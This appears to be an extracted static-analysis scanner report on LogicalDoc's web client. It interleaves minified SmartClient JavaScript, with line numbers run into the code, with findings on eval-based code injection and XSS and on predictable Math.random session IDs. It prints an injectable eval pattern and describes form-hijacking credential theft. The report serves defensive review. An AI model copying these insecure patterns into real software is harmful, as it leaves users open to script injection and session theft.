Views",showHeader:true,expanded:true,hidden:false,items:[this.schemaTree],controls:[this.schemaRefreshButton]});var _1=this;this.dataGrid=this.createAutoChild("dataGrid");this.dataStack.addItem(this.dataGrid);this.outerLayout.addMember(isc.LayoutSpacer.create({height:"10"}));this.addAutoChild("selectButton",{click:function(){_1.hide();_1.$64q.defaults=_1.getGeneratedDataSourceObject();_1.fireCallback(_1.$64r,"node",[_1.$64q])}},null,this.outerLayout);if(this.autoFetchData){this.delayCall("getDefinedDatabases")}},isc.A.getDefinedDatabases=function isc_DatabaseBrowser_getDefinedDatabases(){if(this.serverType=="hibernate"){this.databaseList.hide();this.dbName=null;this.getDatabaseTables()}else{isc.DMI.call({appID:"isc_builtin",className:"com.isomorphic.tools.AdminConsole",methodName:"getDefinedDatabases",arguments:[true],callback:this.getID()+".populateDatabaseList(data)",requestParams:{showPrompt:true,promptStyle:"dialog",prompt:"Loading available databases..."}})}},isc.A.getDatabaseTables=function isc_DatabaseBrowser_getDatabaseTables(){var _1=this;var _2=this.includeSubstring;if(_2&&!


isc.isAn.Array(_2))_2=[_2];var _3=this.excludeSubstring;if(_3&&!isc.isAn.Array(_3))_3=[_3];isc.DMI.call({appID:"isc_builtin",className:"com.isomorphic.tools.BuiltinRPC",methodName:"getTables",arguments:[this.serverType,this.dbName,true,true,this.catalog,this.schema,_2,_3],callback:function(_4){_1.populateSchemaTree(_4.data)},requestParams:{showPrompt:true,promptStyle:"dialog",prompt:"Loading schema..."}})},isc.A.populateDatabaseList=function isc_DatabaseBrowser_populateDatabaseList(_1){this.databaseList.dataSource.setCacheData(_1);var _2={dbStatus:"OK"};this.databaseList.setFilterEditorCriteria(_2);this.databaseList.filterData(_2)},isc.A.clearSchemaTree=function isc_DatabaseBrowser_clearSchemaTree(_1){this.schemaTree.setData([]);this.$64p=null;this.populateDataViewHeader()},isc.A.populateSchemaTree=function isc_DatabaseBrowser_populateSchemaTree(_1){for(var i=0;i<_1.length;i++){_1[i].name=_1[i].TABLE_NAME;_1[i].type=_1[i].TABLE_TYPE.toLowerCase();_1[i].isFolder=true;_1[i].customIcon="[SKIN]../DatabaseBrowser/data.png"}143this.schemaTree.dataSource.setCacheData(_1);this.schemaTree.filterData();if(this.schemaTreeTitle){this.populateSchemaTreeHeader()}144this.tablesRetrieved=true},isc.A.populateSchemaTreeHeader=function isc_DatabaseBrowser_populateSchemaTreeHeader(){},isc.A.populateDataViewHeader=function isc_DatabaseBrowser_populateDataViewHeader(){if(this.$64p){this.dataGridTitle="Data from table "+this.$64p;this.dataGrid.setShowHeader(true)}else{this.dataGridTitle="No table selected";this.dataGrid.setDataSource(null);this.dataGrid.setFields([{name:"placeholder",title:" "}])}145this.dataStack.setTitle(this.dataGridTitle)},isc.A.getDataSourceFromTable=function(tableName){var dbBrowser=this;var shouldQuoteTableName=!/^[A-Za-z][0-9A-Za-z_]*$/.test(tableName);dbBrowser.$64p=tableName;if(dbBrowser.selectButton)dbBrowser.selectButton.setDisabled(false);isc.DMI.call("isc_builtin","com.isomorphic.tools.BuiltinRPC","getDataSourceJSONFromTable",tableName,this.serverType,this.dbName,tableName+"_dbBrowser",{quoteTableName:shouldQuoteTableName},function(rpcResponse,data){var temp="dbBrowser.generatedDataSourceObject = "+data;eval(temp);var gdsoFields=dbBrowser.generatedDataSourceObject.fields,originalFieldsCopy=[];for(var i=0;i<gdsoFields.length;i++){originalFieldsCopy[i]=isc.addProperties({},gdsoFields[i])}146isc.addProperties(dbBrowser.generatedDataSourceObject,{tableName:tableName,quoteTableName:shouldQuoteTableName,dbName:dbBrowser.dbName});dbBrowser.generatedDataSource=isc.DataSource.create(dbBrowser.generatedDataSourceObject);dbBrowser.generatedDataSourceObject.fields=originalFieldsCopy;if(dbBrowser.showDataView){dbBrowser.dataGrid.setDataSource(dbBrowser.generatedDataSource);dbBrowser.dataGrid.fetchData()}})},isc.A.getGeneratedDataSource=function isc_DatabaseBrowser_getGeneratedDataSource(){return this.generatedDataSource},isc.A.getGeneratedDataSourceObject=function isc_DatabaseBrowser_getGeneratedDataSourceObject(){return this.generatedDataSourceObject},isc.A.getResults=function isc_DatabaseBrowser_getResults(_1,_2,_3){this.$64r=_2;this.$64q=_1});isc.B._maxIndex=isc.C+13;isc.ClassFactory.defineClass("HibernateBrowser","Window");isc.A=isc.HibernateBrowser.getPrototype();isc.A.orientation="vertical";isc.A.width="90%";isc.A.height="90%";isc.A.isModal=true;isc.A.showModalMask=true;isc.A.canDragResize=true;isc.A.showMappingTree=true;isc.A.mappingTreeConstructor="TreeGrid";isc.A.mappingTreeDefaults={autoParent:"mappingView",showConnectors:true,showOpenIcons:false,showDropIcons:false,customIconProperty:"customIcon",fields:[{name:"name",title:"Name",width:"60%",showHover:true},{name:"type",title:"Type"},{name:"primaryKey",title:"PK",type:"boolean",width:"10%"},{name:"length",title:"Length",type:"number"}],selectionChanged:function(_1,_2){if(_2){var _3=this.data.getLevel(_1)==1?_1.name:this.data.getParent(_1).name;if(_3&&_3!=this.creator.$64t){this.creator.getDataSourceFromMapping(_3);this.creator.populateDataViewHeader()}}},openFolder:function(_1){if(this.data.getLevel(_1)>1){return this.Super("openFolder",arguments)}147this.Super("openFolder",arguments);var _2=this;var _3=_1.name;isc.DMI.call("isc_builtin","com.isomorphic.tools.BuiltinRPC","getBeanFields",_3,function(_4){_2.populateFields(_1,_4.data)})},getValueIcon:function(_1,_2,_3){if(_3.type=="entity"){return null}else{return this.Super("getValueIcon",arguments)}},populateFields:function(_1,_2){var _3=isc.clone(_2)148_1.children=[];for(var i=0;i<_3.length;i++){_3[i].children=[];_3[i].customIcon="[SKIN]../DatabaseBrowser/column.png"}149this.data.addList(_3,_1)}};isc.A.dataGridConstructor="ListGrid";isc.A.dataGridDefaults={};isc.A.title="Hibernate Browser";isc.A.showSelectButton=true;isc.A.selectButtonConstructor="Button";isc.A.selectButtonDefaults={title:"Next >",enabled:false,autoParent:"outerLayout"};isc.A.outerLayoutDefaults={_constructor:isc.VLayout,width:"100%",height:"100%",autoSize:true,autoDraw:true,autoParent:"body"};isc.A.innerLayoutDefaults={_constructor:isc.HLayout,width:"100%",height:"100%",autoDraw:true,autoParent:"outerLayout"};isc.A.showMappingView=true;isc.A.mappingViewDefaults={_constructor:isc.SectionStack,autoParent:"innerLayout"};isc.A.showDataView=true;isc.A.dataViewDefaults={_constructor:isc.SectionStack,width:"65%",height:"100%",autoParent:"innerLayout"};isc.A=isc.HibernateBrowser.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.B.push(isc.A.initWidget=function isc_HibernateBrowser_initWidget(){this.Super("initWidget",arguments);this.createChildren()},isc.A.createChildren=function isc_HibernateBrowser_createChildren(){this.Super("createChildren");this.body.hPolicy="fill";this.body.vPolicy="fill";var _1=this;this.addAutoChild("outerLayout");this.addAutoChild("innerLayout",null,null,this.outerLayout);this.addAutoChild("mappingView",{showResizeBar:this.showDataView,title:"Hibernate Mappings"},null,this.innerLayout);this.mappingView.addSection({autoDraw:true,showHeader:true,expanded:true,hidden:false,title:"Hibernate Mappings"});this.mappingStack=this.mappingView.sections[0];this.addAutoChild("dataView",null,null,this.innerLayout);this.dataView.addSection({autoDraw:true,showHeader:true,expanded:true,hidden:false});this.dataStack=this.dataView.sections[0];this.mappingTree=this.createAutoChild("mappingTree");this.mappingStack.addItem(this.mappingTree);var _2=this.includeSubstring;if(_2&&!isc.isAn.Array(_2))_2=[_2];var _3=this.excludeSubstring;if(_3&&!isc.isAn.Array(_3))_3=[_3];isc.DMI.call("isc_builtin","com.isomorphic.tools.BuiltinRPC","getHibernateBeans",_2,_3,true,function(_4){_1.populateMappingTree(_4.data)});this.dataGrid=this.createAutoChild("dataGrid");this.dataStack.addItem(this.dataGrid);this.outerLayout.addMember(isc.LayoutSpacer.create({height:"10"}));this.addAutoChild("selectButton",{click:function(){_1.hide();_1.$64q.defaults=_1.getGeneratedDataSourceObject();_1.fireCallback(_1.$64r,"node",[_1.$64q])}},null,this.outerLayout)},isc.A.populateMappingTree=function isc_HibernateBrowser_populateMappingTree(_1){for(var i=0;i<_1.length;i++){_1[i].name=_1[i].entityName;_1[i].type="entity";_1[i].isFolder=true;_1[i].customIcon="[SKIN]../DatabaseBrowser/data.png"}150this.mappingTree.setData(isc.Tree.create({modelType:"children",root:{children:_1}}));if(_1.length==0){this.populateMappingTreeHeader("No Hibernate entities configured")}


Incorrect User Input Filtration when Generating Code on the Fly

This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.

Example

Typical use of eval involves trying to set dynamic properties or invoke dynamic methods on objects. A typical eval statement thus looks something like:

Java Scripteval("user." + propertyName + " = '" + propertyValue +"'"); //Set property with dynamic nameeval("user." + methodName + "()"); // Invoke method dynamically

The program behaves correctly when the propertyName or methodName parameters contain valid identifiers. However, if an attacker specifies values that are both valid and malicious, those operations would be executed on a client side, so the attacker can utilize this vulnerability to perform a cross-site scripting attack [1].


In general, this vulnerability allows the malicious user to do any malicious action to the vulnerable application, while posing as the user that opened the page with the integrated JavaScript code. Often, the target for an XSS attack is the user account data. This is information stored in cookies, as well as user login and password that were intercepted by modifying the authorization form of the web application. The integrated JavaScript code changes the action attribute of the authorization form, that then points to the malicious user’s server.


•

During script generation, we recommend against using parameters that rely on the environment, such as user input, files from non-restricted sources, cookies, hidden form fields, etc.

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the “accept known good” method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be either rejected, or sanitized. When working on script calls, use a strict list that describes allowed symbols in the parameter.

•For example, if the expected input format is an integer, the validation process would reduce any input to an integer type.

•Whitelist-based input validation still cannot guarantee security. If the expected input can contain escape characters, operators or scripting language commands, further data processing is necessary, including screening or encoding.

•Using the eval function is dangerous in any case, since it executes any code. We recommend against using it. If there are no other options, we recommend thoroughly checking the input data.


JavaScript: Using Insufficiently Random Generators in CryptographySeverity: lowLanguage: JavaScriptShort description: Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.Full description: https://localhost:443/scanner/article?articleName=/en/JavaScript/CryptoInsecureRandomness.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-gui/war/login/hosted.htmlCode:

250 var ASCII_EXCLAMATION = 33;251 var ASCII_TILDE = 126;252 var chars = [];253 for (var i = 0; i < 16; ++i) {254 chars.push(Math.floor(ASCII_EXCLAMATION255 + Math.random() * (ASCII_TILDE - ASCII_EXCLAMATION + 1)));256 }257 topWin.__gwt_SessionID = String.fromCharCode.apply(null, chars);258 }259 var plugin = null;260 for (var i = 0; i < pluginFinders.length; ++i) {


481if(_5){_4[_8]=_7;continue}482var _9=_4[_8];if(_9==null){if(_2){_4[_8]=[_7]}else{_4[_8]=_7}}else{if(_2){_4[_8].add(_7)}else{if(isc.isAn.Array(_9)){_4[_8].add(_7)}else{_4[_8]=[_9,_7]}}}}483return _4},isc.A.arraysToObjects=function isc_Arra_arraysToObjects(_1){var _2=_1.length;var _3=new Array(this.length);for(var i=this.length;i--;){var _5=this[i],_6=_3[i]={};for(var p=_2;p--;){var _8=_1[p];_6[_8]=_5[p]}}484return _3},isc.A.objectsToArrays=function isc_Arra_objectsToArrays(_1){var _2=_1.length;var _3=new Array(this.length);for(var i=this.length;i--;){var _5=this[i],_6=_3[i]=[];for(var p=_2;p--;){var _8=_1[p];_6[p]=_5[_8]}}485return _3},isc.A.spliceArray=function isc_Arra_spliceArray(_1,_2,_3){var _4;if(_1===_4)return this.splice();if(_2===_4)return this.splice(_1);if(_3===_4)return this.splice(_1,_2);if(!isc.isAn.Array(_3)){isc.Log.logWarn("spliceArray() method passed a non-array third parameter. Ignoring...","Array");return this.splice(_1,_2)}486return this.splice.apply(this,[_1,_2].concat(_3))},isc.A.peek=function isc_Arra_peek(){var _1=this.pop();this.push(_1);return _1},isc.A.getCachedRow=function isc_Arra_getCachedRow(_1){return this[_1]},isc.A.shuffle=function isc_Arra_shuffle(){var n=this.length;while(n>0){var i=Math.floor(Math.random()*n);n--;var _3=this[n];this[n]=this[i];this[i]=_3}},isc.A.removeItem=function isc_Arra_removeItem(_1){return this.removeAt(_1)},isc.A.getItem=function isc_Arra_getItem(_1){return this.get(_1)},isc.A.setItem=function isc_Arra_setItem(_1){return this.set(_1)},isc.A.clearAll=function isc_Arra_clearAll(_1){return this.removeList(this)},isc.A.size=function isc_Arra_size(){return this.getLength()},isc.A.subList=function isc_Arra_subList(_1,_2){return this.getRange(_1,_2)},isc.A.addAll=function isc_Arra_addAll(_1){return this.addList(_1)},isc.A.removeAll=function isc_Arra_removeAll(_1){var _2=this.getLength();this.removeList(_1);return this.getLength()!=_2},isc.A.clear=function isc_Arra_clear(){this.setLength(0)},isc.A.toArray=function isc_Arra_toArray(){return this.duplicate()});isc.B._maxIndex=isc.C+79;if(!isc.Browser.isIE||isc.Browser.isIE8Strict){Array.prototype.duplicate=Array.prototype.slice}487if(isc.Browser.isIE){[].fastIndexOf();[].fastIndexOf()}488if(Array.prototype.nativeIndexOf!=null){Array.prototype.indexOf=function(_1,_2,_3,_4){var _5=Object(this),_6=_5.length>>>0;if(_2==null)_2=0;else if(_2<0)_2=Math.max(0,_6+_2);if(_3==null)_3=_6-1;var i;if(_4!=null){for(i=_2;i<=_3;++i){if(_4(_5[i],_1))return i}}else{if(isc.isAn.Instance(_1)){i=Array.prototype.nativeIndexOf.call(_5,_1,_2);if(i>_3)i=-1;return i}489for(i=_2;i<=_3;++i){if(_5[i]==_1)return i}}

https://localhost:443/scanner/article?articleName=/en/JavaScript/CryptoInsecureRandomness.html





490return-1}}else{Array.prototype.nativeIndexOf=Array.prototype.indexOf}491if(isc.Browser.isFirefox||isc.Browser.isSafari){Array.prototype.fastIndexOf=Array.prototype.nativeIndexOf}


635_5.exp+=(-1*_1);return _5.normalize()}636return isc.BigDecimal.create(this)},isc.A.ceil=function isc_BigDecimal_ceil(_1){return this.round(_1,"ceil")},isc.A.floor=function isc_BigDecimal_floor(_1){return this.round(_1,"floor")},isc.A.init=function isc_BigDecimal_init(){this.Super("init",arguments);if(arguments&&arguments[0]){var _1=arguments[0];if(isc.isA.Number(_1)){_1=_1.toExponential(20)}637if(isc.isA.String(_1)){var _2=this.r.exec(_1);if(_2){if(_2[0]!=="NaN"){this.nanValue=false;if(_2[1]!==undefined){this.sign=(_2[1]==="-"?-1:1)}638if(_2[7]!==undefined){this.infinityValue=true}else{if(_2[6]!==undefined){this.exp=new Number(_2[6]);if(_2[5]==='-'){this.exp*=-1}}639if(_2[2]!==undefined){this.num=_2[2];this.num=this.num.replace(/^0*/,"")}else{this.num=_2[3];this.num=this.num.replace(/^0*/,"");if(_2[4]!==undefined){_2[4]=_2[4].replace(/0*$/,"");this.exp-=_2[4].length;this.num+=_2[4];this.num=this.num.replace(/^0*/,"")}}640this.normalize()}}}}else if(_1===Infinity){this.nanValue=false;this.sign=1;this.infinityValue=true}else if(_1===-Infinity){this.nanValue=false;this.sign=-1;this.infinityValue=true}else if(isc.isA.BigDecimal(_1)){this.nanValue=_1.isNaN();this.infinityValue=_1.isInfinity();this.sign=_1.getSign();this.num=_1.getNum();this.exp=_1.getExp();this.normalize()}}});isc.B._maxIndex=isc.C+17;isc.Math={clamp:function(_1,_2,_3){if(_1<_2)return _2;if(_1>_3)return _3;return _1},random:function(_1,_2){if(_2==null){return Math.floor(Math.random()*(_1+1))}else{return Math.floor(Math.random()*(_2-_1+1))+_1}},$119q:function(_1,_2){var _3=_1.toString(16);if(_3.length<_2)_3=isc.NumberUtil.$eg(_2-_3.length)+_3;return _3},randomUUID:function(){var _1;if(window.Uint16Array&&window.crypto&&window.crypto.getRandomValues){_1=new window.Uint16Array(8);window.crypto.getRandomValues(_1)}else{_1=new Array(8);var _2=new Date().getTime();for(var i=0;i<_1.length;++i){_1[i]=(_2^(Math.random()*65536))&0xFFFF}}641_1[3]=(_1[3]&0x0FFF)|0x4000;_1[4]=(_1[4]&0xBFFF)|0x8000;return(this.$119q(_1[0],4)+this.$119q(_1[1],4)+"-"+this.$119q(_1[2],4)+"-"+this.$119q(_1[3],4)+"-"+this.$119q(_1[4],4)+"-"+this.$119q(_1[5],4)+this.$119q(_1[6],4)+this.$119q(_1[7],4)).toUpperCase()},randomString:function(_1,_2){var _3=new Array(_1);var _4;if(isc.isA.Number(_2)){_4=_2;_2="0123456789abcdefghijklmnopqrstuvwxyz".substring(0,_4)}else{_4=_2.length}642for(var i=0;i<_1;++i){_3[i]=_2[this.random(_4-1)]}643return _3.join("")},$101j:function(_1){return(_1<0?-1:(_1>0?1:0))},$101k:function(_1,_2){_1=Math.abs(_1);_2=Math.abs(_2);if(_1>_2){return _1*Math.sqrt(1+_2*_2/_1/_1)}else if(_2!=0){return _2*Math.sqrt(1+_1*_1/_2/_2)}else{return _1}},euclideanDistanceToLine:function(_1,_2,_3,_4,_5,_6){var _7=_3-_1,_8=_4-_2;var _9=_7*_7+_8*_8;if(_9<=0.00001){return this.euclideanDistance(_1,_2,_5,_6)}644var u=((_5-_1)*(_3-_1)+(_6-_2)*(_4-_2))/_9;if(u<0){return this.euclideanDistance(_1,_2,_5,_6)}else if(u>1){return this.euclideanDistance(_3,_4,_5,_6)}else{var x=_1+u*_7,y=_2+u*_8;return this.euclideanDistance(x,y,_5,_6)}},euclideanDistance:function(_1,_2,_3,_4){if(arguments.length==2){var _5=_1,_6=_2;_1=_5[0];_2=_5[1];_3=_6[0];_4=_6[1]}645return this.$101k((_1-_3),(_2-_4))},$125w:Math.PI/180,$167a:Math.PI/2,toRadians:function(_1){return _1*this.$125w},cosdeg:function(_1){return Math.cos(_1*this.$125w)},sindeg:function(_1){return Math.sin(_1*this.$125w)},$fr:function(_1,_2){var _3=0;for(var i=0;i<_1.length;++i){_3+=_1[i]*_2[i]}


3735var _2=_1.$152v();_2.name=_1.name.toLowerCase();_2.defaultSortPosition=-1;if(!this.$65z[_2.name]){this.$65z[_2.name]=_2}3736var _3=_1.$152v();_3.name=_1.name.toUpperCase();_3.defaultSortPosition=-1;if(!this.$65z[_3.name]){this.$65z[_3.name]=_3}3737var _4=_1.$152v();_4.name=(_1.name.substr(0,1).toUpperCase()+_1.name.substr(1));_4.defaultSortPosition=-1;if(!this.$65z[_4.name]){this.$65z[_4.name]=_4}},isc.A.getRegisteredFunctionNames=function isc_c_MathFunction_getRegisteredFunctionNames()


{return isc.getKeys(this.$65z)},isc.A.getDefaultFunctionNames=function isc_c_MathFunction_getDefaultFunctionNames(){var _1=this.getDefaultFunctions(),_2=_1.makeIndex("name",false);return isc.getKeys(_2)},isc.A.getRegisteredFunctions=function isc_c_MathFunction_getRegisteredFunctions(){return isc.getValues(this.$65z)},isc.A.getDefaultFunctions=function isc_c_MathFunction_getDefaultFunctions(){var _1=this.getRegisteredFunctions(),_2=_1.findAll("defaultSortPosition",-1)||[];for(var i=0;i<_2.length;i++){var _4=_2[i];_1.remove(_4)}3738_1.sortByProperties(["defaultSortPosition"],["true"]);return _1},isc.A.getRegisteredFunctionIndex=function isc_c_MathFunction_getRegisteredFunctionIndex(){var x=this.getRegisteredFunctions();var _2=x.makeIndex("name",false);return _2},isc.A.getDefaultFunctionIndex=function isc_c_MathFunction_getDefaultFunctionIndex(){return this.getDefaultFunctions().makeIndex("name",false)},isc.A.isRegistered=function isc_c_MathFunction_isRegistered(_1){if(this.$65z[_1])return true;return false});isc.B._maxIndex=isc.C+8;isc.A=isc.MathFunction.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.defaultSortPosition=-1;isc.B.push(isc.A.$152v=function isc_MathFunction__copy(_1){var _2={};for(var _3 in this){if(this.hasOwnProperty(_3)){_2[_3]=this[_3]}}3739return this.getClass().create(_2,_1)});isc.B._maxIndex=isc.C+1;isc.MathFunction.registerFunction(isc.MathFunction.create({name:"max",description:"Maximum of two values",usage:"max(value1, value2)",defaultSortPosition:1,jsFunction:function(_1,_2){return Math.max(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"min",description:"Minimum of two values",usage:"min(value1, value2)",defaultSortPosition:2,jsFunction:function(_1,_2){return Math.min(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"clamp",description:"Value clamped to range specified",usage:"clamp(value1, value2)",defaultSortPosition:3,jsFunction:function(_1,_2,_3){return isc.Math.clamp(_1,_2,_3)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"round",description:"Round a value up or down, optionally providing <i>decimalDigits</i> as the maximum number of decimal places to round to. For fixed or precision rounding, use <i>toFixed()</i> and <i>toPrecision()</i> respectively.",usage:"round(value,decimalDigits)",defaultSortPosition:4,jsFunction:function(_1,_2){if(_2){var _3=Math.pow(10,_2),_4=Math.round(_1*_3)/_3;return _4}3740return Math.round(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"ceil",description:"Round a value up",usage:"ceil(value)",defaultSortPosition:5,jsFunction:function(_1){return Math.ceil(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"floor",description:"Round a value down",usage:"floor(value)",defaultSortPosition:6,jsFunction:function(_1){return Math.floor(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"abs",description:"Absolute value",usage:"abs(value)",defaultSortPosition:7,jsFunction:function(_1){return Math.abs(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"pow",description:"Value1 to the power of Value2",usage:"pow(value1, value2)",defaultSortPosition:8,jsFunction:function(_1,_2){return Math.pow(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"sqrt",description:"Square root of a value",usage:"sqrt(value)",defaultSortPosition:9,jsFunction:function(_1){return Math.sqrt(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"dateAdd",description:"Excel™-compatible dataAdd function: adds a specified time interval to a date value",usage:"dateAdd(Date value, TimeUnit interval, number amount)",defaultSortPosition:10,jsFunction:function(_1,_2,_3){if(_1==null||!isc.isA.Date(_1))return null;var _4=_1.duplicate();isc.DateUtil.dateAdd(_4,_2,_3,1,_1.logicalDate);return _4}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"toPrecision",description:"Format a number to a length of <i>precision</i> digits, rounding or adding a decimal point and zero-padding as necessary. Note that the values 123, 12.3 and 1.23 have an equal precision of 3. Returns a formatted string and should be used as the outermost function call in a formula. For rounding, use <i>round()</i>.",usage:"toPrecision(value,precision)",defaultSortPosition:11,jsFunction:function(_1,_2){var _3=_1;if(isc.isA.String(_3))_3=parseFloat(_3);if(isNaN(_3))return _1;return _3.toPrecision(_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"toFixed",description:"Round or zero-pad a number to <i>digits</i> decimal places. Returns a formatted string and should be used as the outermost function call in a formula. To round values or restrict precision, use <i>round()</i> and <i>toPrecision()</i> respectively.",usage:"toFixed(value,digits)",defaultSortPosition:12,jsFunction:function(_1,_2){var _3=_1;if(isc.isA.String(_3))_3=parseFloat(_3);if(isNaN(_3))return _1;return _3.toFixed(_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"sin",description:"Sine of a value",usage:"sin(value)",defaultSortPosition:13,jsFunction:function(_1){return Math.sin(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"cos",description:"Cosine of a value",usage:"cos(value)",defaultSortPosition:14,jsFunction:function(_1){return Math.cos(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"tan",description:"Tangent of a value",usage:"tan(value)",defaultSortPosition:15,jsFunction:function(_1){return Math.tan(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"ln",description:"Natural logarithm of a value",usage:"ln(value)",defaultSortPosition:16,jsFunction:function(_1){return Math.log(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"log",description:"logarithm of a value with the specified <i>base</i>",usage:"log(base, value)",defaultSortPosition:17,jsFunction:function(_1,_2){return Math.log(_2)/Math.log(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"asin",description:"Arcsine of a value",usage:"asin(value)",defaultSortPosition:18,jsFunction:function(_1){return Math.asin(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"acos",description:"Arccosine of a value",usage:"acos(value)",defaultSortPosition:19,jsFunction:function(_1){return Math.acos(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan",description:"Arctangent of a value (-PI/2 to PI/2 radians)",usage:"atan(value)",defaultSortPosition:20,jsFunction:function(_1){return Math.atan(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan2",description:"Angle theta of a point (-PI to PI radians)",usage:"atan2(value1,value2)",defaultSortPosition:21,jsFunction:function(_1,_2)


{return Math.atan2(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"exp",description:"The value of E<sup>value</sup>",usage:"exp(value)",defaultSortPosition:22,jsFunction:function(_1){return Math.exp(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"random",description:"Random number between 0 and 1",usage:"random()",defaultSortPosition:23,jsFunction:function(){return Math.random()}}));isc.Canvas.registerStringMethods({userAddedField:"field",selectionUpdated:"record,recordList",onFetchData:"criteria,requestProperties"});isc.defineClass("EdgedCanvas","Canvas");isc.A=isc.EdgedCanvas.getPrototype();isc.A.redrawOnResize=false;isc.A._redrawWithParent=false;isc.A.$jp=false;isc.A.$jo=false;isc.A.useClipDiv=false;isc.A.isSnapAlignCandidate=false;isc.A.overflow=isc.Browser.isMoz?isc.Canvas.VISIBLE:isc.Canvas.HIDDEN;isc.A.$ks=false;isc.A.$tb=0;isc.A.$td=0;isc.A.$tc=0;isc.A.$te=0;isc.A.$y0=["TL","T","TR","L","center","R","BL","B","BR"];isc.A.$98g={L:true,TL:true,BL:true};isc.A.$98h={R:true,TR:true,BR:true};isc.A.$920=["TR","T","TL","R","center","L","BR","B","BL"];isc.A.skinImgDir="images/edges/";isc.A.edgeImage="[SKIN]/rounded/frame/FFFFFF/6.png";isc.A.shownEdges={TL:true,T:true,TR:true,L:true,R:true,BL:true,B:true,BR:true};isc.A.edgeSize=6;isc.A=isc.EdgedCanvas.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.$61h="<TD class='";isc.A.$61i="' ></TD>";isc.A.$y2="<TABLE role='presentation' CELLPADDING='0' CELLSPACING='0' STYLE='height:100%;width:100%;table-layout:fixed'><COL WIDTH=";isc.A.$y3="><COL><COL WIDTH=";isc.A.$98i=["background-size:",,," ",,,";"];isc.A.$4n=" class=";isc.A.addEdgeStyleSuffix=false;isc.A.forceMozRowHeight=true;isc.B.push(isc.A.initWidget=function isc_EdgedCanvas_initWidget(){this.invokeSuper(isc.EdgedCanvas,this.$oc);var _1=this.customEdges;if(_1){var _2=this.shownEdges={};if(_1.contains("T")){_2.T=_2.TL=_2.TR=true}3741if(_1.contains("B")){_2.B=_2.BL=_2.BR=true}3742if(_1.contains("L")){_2.L=_2.TL=_2.BL=true}3743if(_1.contains("R")){_2.R=_2.TR=_2.BR=true}}3744this.updateEdgeSizes()},isc.A.updateEdgeSizes=function isc_EdgedCanvas_updateEdgeSizes(){var _1=this.edgeSize;this.$y4=this.$du(this.edgeLeft,_1);this.$y5=this.$du(this.edgeRight,_1);this.$y6=this.$du(this.edgeTop,_1);this.$y7=this.$du(this.edgeBottom,_1);var _2=this.shownEdges,_3=this.edgeOffset;if(_2.L)this.$tb=this.$du(this.edgeOffsetLeft,_3,this.$y4);if(_2.R)this.$tc=this.$du(this.edgeOffsetRight,_3,this.$y5);if(_2.T)this.$td=this.$du(this.edgeOffsetTop,_3,this.$y6);if(_2.B)this.$te=this.$du(this.edgeOffsetBottom,_3,this.$y7);this.markForRedraw()},isc.A.getInnerWidth=function isc_EdgedCanvas_getInnerWidth(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerWidth",_1,_2,_3);return _4-this.$tb-this.$tc},isc.A.getInnerHeight=function isc_EdgedCanvas_getInnerHeight(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerHeight",_1,_2,_3);return _4-this.$td-this.$te},isc.A.getInnerHTML=function isc_EdgedCanvas_getInnerHTML(){var _1=isc.SB.create(),_2=this.edgeImage,_3=_2.lastIndexOf(isc.dot),_4=_2.substring(0,_3),_5=_2.substring(_3),_6=this.getImgURL(_4),_7="<TD HEIGHT=",_8="<TD",_9,_10,_11;if(!isc.Browser.isIE10&&!isc.Browser.isEdge&&!((isc.Browser.isStrict&&isc.Browser.isIE&&isc.Browser.version>=8)||(isc.Browser.isMoz&&isc.Browser.isUnix)))3745{var _12=isc.EdgedCanvas.$y8;if(!_12){_12=isc.EdgedCanvas.$y8={width:"100%",height:"100%"};if(isc.Browser.isSafari)_12.align="middle";if(isc.Browser.isStrict&&!isc.Browser.isTransitional){_12.extraCSSText="display:block"}


